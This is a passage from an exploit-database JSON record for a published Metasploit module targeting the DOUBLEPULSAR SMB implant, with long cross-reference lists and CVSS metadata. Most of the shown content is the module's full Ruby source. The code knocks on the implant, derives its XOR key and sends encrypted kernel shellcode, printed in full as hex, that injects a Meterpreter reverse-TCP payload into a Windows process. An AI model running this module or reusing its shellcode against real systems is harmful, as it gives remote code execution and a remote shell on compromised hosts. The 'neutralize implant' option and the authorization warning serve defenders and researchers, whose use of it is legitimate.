"PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96709", "SMNTC-96705", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-12T22:41:50", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-12T22:41:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-13] #"}, "lastseen": "2021-10-12T22:41:50", "differentElements": ["sourceData"], "edition": 43}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "5d3ff3f784b28b3897cd90e5bee5ca61", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-14T08:21:09", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-33895"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96704", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", 